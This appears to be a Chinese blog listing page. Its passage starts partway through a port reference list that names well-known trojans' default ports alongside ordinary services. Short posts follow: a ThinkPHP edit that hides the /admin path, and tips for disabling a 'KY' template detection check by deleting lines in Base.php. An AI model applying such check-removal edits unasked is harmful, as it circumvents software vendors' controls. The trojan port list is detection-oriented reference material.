2000终端开放此端口3456端口:inetinfo.exe(互联网信息服务)开放端口,VAT默认数据3457端口:VAT默认控制3527端口:Microsoft消息队列服务器3700端口:木马Portal of Doom开放此端口3996端口:木马RemoteAnything开放此端口4000端口:腾讯QQ客户端开放此端口4060端口:木马RemoteAnything开放此端口4092端口:木马WinCrash开放此端口4133端口:NUTS Bootp服务器4134端口:NIFTY-Serve HMI协议4141端口:Workflow服务器4142端口:文档服务器4143端口:文档复制4145端口:VVR控制4321端口:远程Who Is查询4333端口:微型sql服务器4349端口:文件系统端口记录4350端口:网络设备4351端口:PLCY网络服务4453端口:NSS警报管理4454端口:NSS代理管理4455端口:PR聊天用户4456端口:PR聊天服务器4457端口:PR注册4480端口:Proxy+ HTTP代理端口4500端口:Lsass开放端口,不能关闭4547端口:Lanner许可管理4555端口:RSIP端口4590端口:木马ICQTrojan开放此端口4672端口:远程文件访问服务器4752端口:简单网络音频服务器4800端口:Icona快速消息系统4801端口:Icona网络聊天4802端口:Icona许可系统服务器4848端口:App服务器-Admin HTTP4849端口:App服务器-Admin HTTPS4950端口:木马IcqTrojan开放5000端口5000端口:木马blazer5,Sockets de Troie开放5000端口,一般应关闭5001端口:木马Sockets de Troie开放5001端口5006端口:wsm服务器5007端口:wsm服务器ssl5022端口:mice服务器5050端口:多媒体会议控制协议5051端口:ITA代理5052端口:ITA管理5137端口:MyCTS服务器端口5150端口:Ascend通道管理协议5154端口:BZFlag游戏服务器5190端口:America-Online(美国在线)5191端口:AmericaOnline1(美国在线)5192端口:AmericaOnline2(美国在线)5193端口:AmericaOnline3(美国在线)5222端口:Jabber客户端连接5225端口:HP(惠普公司)服务器5226端口:HP(惠普公司)5232端口:SGI绘图软件端口5250端口:i网关5264端口:3Com网络端口15265端口:3Com网络端口25269端口:Jabber服务器连接5306端口:Sun MC组5321端口:木马Sockets de Troie开放5321端口5400端口:木马Blade Runner开放此端口5401端口:木马Blade Runner开放此端口5402端口:木马Blade Runner开放此端口5405端口:网络支持5409端口:Salient数据服务器5410端口:Salient用户管理5415端口:NS服务器5416端口:SNS网关5417端口:SNS代理5421端口:网络支持25423端口:虚拟用户5427端口:SCO-PEER-TTA(Unix系统)5432端口:PostgreSQL数据库5550端口:木马xtcp开放此端口5569端口:木马Robo-Hack开放此端口5599端口:公司远程安全安装5600端口:公司安全管理5601端口:公司安全代理5631端口:pcANYWHERE(软件)数据5632端口:pcANYWHERE(软件)数据5673端口:JACL消息服务器5675端口:V5UA应用端口5676端口:RA管理5678端口:远程复制代理连接5679端口:直接电缆连接5720端口:MS-执照5729端口:Openmail用户代理层5730端口:Steltor's日历访问5731端口:netscape(网景)suiteware5732端口:netscape(网景)suiteware5742端口:木马WinCrash1.03开放此端口5745端口:fcopy-服务器5746端口:fcopys-服务器5755端口:OpenMail(邮件服务器)桌面网关服务器5757端口:OpenMail(邮件服务器)X.500目录服务器5766端口:OpenMail (邮件服务器)NewMail服务器5767端口:OpenMail (邮件服务器)请求代理曾(安全)5768端口:OpenMail(邮件服务器) CMTS服务器5777端口:DALI端口5800端口:虚拟网络计算5801端口:虚拟网络计算5802端口:虚拟网络计算HTTP访问, d5803端口:虚拟网络计算HTTP访问, d5900端口:虚拟网络计算机显示05901端口:虚拟网络计算机显示15902端口:虚拟网络计算机显示25903端口:虚拟网络计算机显示36000端口:X Window 系统6001端口:X Window 服务器6002端口:X Window 服务器6003端口:X Window 服务器6004端口:X Window 服务器6005端口:X Window 服务器6006端口:X Window 服务器6007端口:X Window 服务器6008端口:X Window 服务器6009端口:X Window 服务器6456端口:SKIP证书发送6471端口:LVision许可管理器6505端口:BoKS管理私人端口6506端口:BoKS管理公共端口6507端口:BoKS Dir服务器,私人端口6508端口:BoKS Dir服务器,公共端口6509端口:MGCS-MFP端口6510端口:MCER端口6566端口:SANE控制端口6580端口:Parsec主服务器6581端口:Parsec对等网络6582端口:Parsec游戏服务器6588端口:AnalogX HTTP代理端口6631端口:Mitchell电信主机6667端口:Internet多线交谈6668端口:Internet多线交谈6670端口:木马Deep Throat开放此端口6671端口:木马Deep Throat 3.0开放此端口6699端口:Napster文件(MP3)共享服务6701端口:KTI/ICAD名称服务器6788端口:SMC软件-HTTP6789端口:SMC软件-HTTPS6841端口:Netmo软件默认开放端口6842端口:Netmo HTTP服务6883端口:木马DeltaSource开放此端口6939端口:木马Indoctrination开放此端口6969端口:木马Gatecrasher、Priority开放此端口6970端口:real音频开放此端口7000端口:木马Remote Grab开放此端口7002端口:使用者& 组 数据库7003端口:音量定位数据库7004端口:AFS/Kerberos认证服务7005端口:音量管理服务7006端口:错误解释服务7007端口:Basic监督进程7008端口:服务器-服务器更新程序7009端口:远程缓存管理服务7011端口:Talon软件发现端口7012端口:Talon软件引擎7013端口:Microtalon发现7014端口:Microtalon通信7015端口:Talon网络服务器7020端口:DP服务7021端口:DP服务管理7100端口:X字型服务7121端口:虚拟原型许可证管理7300端口:木马NetMonitor开放此端口7301端口:木马NetMonitor开放此端口7306端口:木马NetMonitor,NetSpy1.0开放此端口7307端口:木马NetMonitor开放此端口7308端口:木马NetMonitor开放此端口7323端口:Sygate服务器端7511端口:木马聪明基因开放此端口7588端口:Sun许可证管理7597端口:木马Quaz开放此端口7626端口:木马冰河开放此端口7633端口:PMDF管理7674端口:iMQ SSL通道7675端口:iMQ通道7676端口:木马Giscier开放此端口7720端口:Med图象入口7743端口:Sakura脚本传递协议7789端口:木马ICKiller开放此端口7797端口:Propel连接器端口7798端口:Propel编码器端口8000端口:腾讯QQ服务器端开放此端口8001端口:VCOM通道8007端口:Apache(类似iis)jServ协议1.x8008端口:HTTP Alternate8009端口:Apache(类似iis)JServ协议1.38010端口:Wingate代理开放此端口8011端口:木马way2.4开放此端口8022端口:OA-系统8080端口:WWW代理开放此端口8081端口:ICECap控制台8082端口:BlackIce(防止黑客软件)警报发送到此端口8118端口:Privoxy HTTP代理8121端口:Apollo数据端口8122端口:Apollo软件管理端口8181端口:Imail8225端口:木马灰鸽子开放此端口8311端口:木马初恋情人开放此端口8351端口:服务器寻找8416端口:eSpeech Session协议8417端口:eSpeech RTP协议8473端口:虚拟点对点8668端口:网络地址转换8786端口:Message客户端8787端口:Message服务器8954端口:Cumulus管理端口9000端口:CS监听9001端口:ETL服务管理9002端口:动态id验证9021端口:Pangolin验证9022端口:PrivateArk远程代理9023端口:安全网络登陆-19024端口:安全网络登陆-29025端口:安全网络登陆-39026端口:安全网络登陆-49101端口:Bacula控制器9102端口:Bacula文件后台9103端口:Bacula存储邮件后台9111端口:DragonIDS控制台9217端口:FSC通讯端口9281端口:软件传送端口19282端口:软件传送端口29346端口:C技术监听9400端口:木马Incommand 1.0开放此端口9401端口:木马Incommand 1.0开放此端口9402端口:木马Incommand 1.0开放此端口9594端口:信息系统9595端口:Ping Discovery服务9800端口:WebDav源端口9801端口:Sakura脚本转移协议-29802端口:WebDAV Source TLS/SSL9872端口:木马Portal of Doom开放此端口9873端口:木马Portal of Doom开放此端口9874端口:木马Portal of Doom开放此端口9875端口:木马Portal of Doom开放此端口9899端口:木马InIkiller开放此端口9909端口:域名时间9911端口:SYPECom传送协议9989端口:木马iNi-Killer开放此端口9990端口:OSM Applet程序服务器9991端口:OSM事件服务器10000端口:网络数据管理协议10001端口:SCP构造端口10005端口:安全远程登陆10008端口:Octopus多路器10067端口:木马iNi-Killer开放此端口10113端口:NetIQ端点10115端口:NetIQ端点10116端口:NetIQVoIP鉴定器10167端口:木马iNi-Killer开放此端口11000端口:木马SennaSpy开放此端口11113端口:金山词霸开放此端口11233端口:木马Progenic trojan开放此端口12076端口:木马Telecommando开放此端口12223端口:木马Hack'99 KeyLogger开放此端口12345端口:木马NetBus1.60/1.70、GabanBus开放此端口12346端口:木马NetBus1.60/1.70、GabanBus开放此端口12361端口:木马Whack-a-mole开放此端口13223端口:PowWow 客户端,是Tribal Voice的聊天程序13224端口:PowWow 服务器,是Tribal Voice的聊天程序16959端口:木马Subseven开放此端口16969端口:木马Priority开放此端口17027端口:外向连接19191端口:木马蓝色火焰开放此端口20000端口:木马Millennium开放此端口20001端口:木马Millennium开放此端口20034端口:木马NetBus Pro开放此端口21554端口:木马GirlFriend开放此端口22222端口:木马Prosiak开放此端口23444端口:木马网络公牛开放此端口23456端口:木马Evil FTP、Ugly FTP开放此端口25793端口:Vocaltec地址服务器26262端口:K3软件-服务器26263端口:K3软件客户端26274端口:木马Delta开放此端口27374端口:木马Subseven 2.1开放此端口30100端口:木马NetSphere开放此端口30129端口:木马Masters Paradise开放此端口30303端口:木马Socket23开放此端口30999端口:木马Kuang开放此端口31337端口:木马BO(Back Orifice)开放此端口31338端口:木马BO(Back Orifice),DeepBO开放此端口31339端口:木马NetSpy DK开放此端口31666端口:木马BOWhack开放此端口31789端口:Hack-a-tack32770端口:sun solaris RPC服务开放此端口33333端口:木马Prosiak开放此端口33434端口:路由跟踪34324端口:木马Tiny Telnet Server、BigGluck、TN开放此端口36865端口:KastenX软件端口38201端口:Galaxy7软件数据通道39681端口:TurboNote默认端口40412端口:木马The Spy开放此端口40421端口:木马Masters Paradise开放此端口40422端口:木马Masters Paradise开放此端口40423端口:木马Masters Paradise开放此端口40426端口:木马Masters Paradise开放此端口40843端口:CSCC 防火墙43210端口:木马SchoolBus 1.0/2.0开放此端口43190端口:IP-PROVISION44321端口:PCP服务器(pmcd)44322端口:PCP服务器(pmcd)代理44334端口:微型个人防火墙端口44442端口:ColdFusion软件端口44443端口:ColdFusion软件端口44445端口:木马Happypig开放此端口45576端口:E代时光专业代理开放此端口47262端口:木马Delta开放此端口47624端口:Direct Play服务器47806端口:ALC协议48003端口:Nimbus网关50505端口:木马Sockets de Troie开放此端口50766端口:木马Fore开放此端口53001端口:木马Remote Windows Shutdown开放此端口54320端口:木马bo2000开放此端口54321端口:木马SchoolBus 1.0/2.0开放此端口61466端口:木马Telecommando开放此端口65000端口:木马Devil 1.03开放此端口65301端口:PC Anywhere软件开放端口
2023年02月07日
7 阅读
0 评论
0 点赞
2023-02-05
不使用/admin作为后台路径
不想使用/admin作为后台路径,但是由于thinkphp5.1不支持路由映射,因为此方法需要修改核心文件。总共需要修改两处:1:thinkphp/library/think/route/dispatch/Module.php大约31行增加代码if ($result[0] == 'admin') { throw new HttpException(404, 'module not exists:admin'); } if ($result[0] == 'aa') { $result[0] = 'admin'; }2:thinkphp/library/think/Url.php大约275行增加代码if ($module == 'admin/') { $module = 'aa/'; }
2023年02月05日
8 阅读
0 评论
0 点赞
2023-02-05
KY删除模板解决办法
{dotted startColor="#6bfffd" endColor="#18fb91"/}隐藏内容,请前往内页查看详情{/hide}
2023年02月05日
10 阅读
0 评论
0 点赞
2023-02-05
KY检测模板解决办法
找到application/common/controller/Base.php文件,第50,51,52行,注释掉或者删掉这三行即可,如图:
2023年02月05日
21 阅读
0 评论
0 点赞
1
...
6
7
8
...
16
0:00